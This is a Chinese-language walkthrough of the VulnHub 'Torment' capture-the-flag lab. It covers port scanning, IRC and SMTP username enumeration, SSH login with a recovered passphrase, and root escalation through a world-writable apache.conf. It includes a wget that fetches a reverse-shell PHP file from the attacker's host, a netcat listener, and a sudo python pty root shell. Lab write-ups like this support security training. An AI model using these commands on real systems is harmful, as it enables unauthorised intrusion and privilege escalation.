一.环境搭建
1.靶场描述
2.靶场下载
https://download.vulnhub.com/digitalworld/TORMENT.7z
3.靶场启动
二.信息收集
1.寻找靶场真实的IP地址
nmap -sP 192.168.79.0/24
arp-scan -l
kaliIP地址为192.168.79.129
2.探测端口及服务
nmap -p- -sV http://192.168.79.129
我们可以看到开启的端口有好多,重点我们看看21,22,135,445,631端口
我们查看631端口
点击Printers
,发现一些名称,收集下来当作用户字典尝试爆破。
三.渗透测试
1.访问web服务
是一个apache2服务
因为扫描不到任何有用的信息,所以这里我们不在进行扫描
2.渗透测试
1)ftp服务
我们看到开启了21端口,我们进行连接
我们可以看到有group,passwd等等备份文件,但是我们没有权限查看
我们在看看其他的
2)ngircd软件
我们可以看到有ngircd软件和ssh
在Kali Linux中,ngircd是一个轻量级的IRC(Internet Relay Chat)服务器软件。它允许用户在自己的系统上搭建IRC服务器,用于聊天室、文件共享、实时通信等目的。Kali Linux作为一款专注于安全渗透测试和数字取证的操作系统,虽然其主要功能并非直接提供IRC服务,但ngircd的存在为用户提供了一个灵活的工具,可以在渗透测试或安全研究过程中模拟IRC环境,进行相关的安全分析和测试。
我们查看ngircd目录和ssh命令
这里IP地址变为192.168.79.130
我们查看channels,可以看到2个频道,games tormentedprinter
尝试ssh公钥连接,但是需要key
3)hexchat访问目标系统
我们安装ngircd服务器
HexChat是一个开源的IRC客户端
软件平台:Windows、Linux和Unix。
软件特性:基于XChat开发,但HexChat在任何平台上都是完全免费的。它继承了X-Chat的经典特性,并在功能和用户体验上进行了优化。
技术特点: 加密通讯:基于GPLv2许可发布,允许自由编译、链接以及使用OpenSSL,具备强大的加密通讯能力。
跨平台兼容性:采用C语言编写,确保了良好的性能和跨平台兼容性。
扩展性:提供了一个完整的API,支持Python和Perl脚本编程,让开发者可以轻松扩展其功能。
apt install hexchat
hexchat
输入目标系统IP地址,但是没有密码。
cd /etc/ngircd
cat ngircd.conf
kali本地下载ngircd,查看默认密码——wealllikedebian
我们进行连接,首先我们查看games频道,发现什么也没有,我们查看tormentedprinter
我们可以看到一串密码,mostmachineshaveasupersecurekeyandalongpassphrase
这个密码可能是ssh的key,但是我们不知道用户名,我们使用smtp进行扫描
4)smtp扫描用户名
我们扫描出来2个用户名,一个是Patrick,一个是Qiu
5)ssh登录
ssh使用密钥尝试登陆用户,最后patrick成功登陆
6)提权
发现只有关机,重启具有root权限
find / -perm 777 -type f 2>/dev/null
发现apache服务的apache.conf对所有用户都具有读写权限。
编辑apache.conf文件,添加如下内容
此时下载反弹shell文件,然后再重启服务
cd /var/www/html/
wget http://192.168.79.128/MS02423.php
sudo /bin/systemctl reboot
重启之后访问http://192.168.79.130/MS02423.php,成功获取到shell
查看当前用户权限,发现python具有root权限,直接使用sudo python -c 'import pty;pty.spawn("/bin/bash")'
即可提权
nc -lvnp 9999
python -c 'import pty;pty.spawn("/bin/bash")'
sudo -l
sudo python -c 'import pty;pty.spawn("/bin/bash")'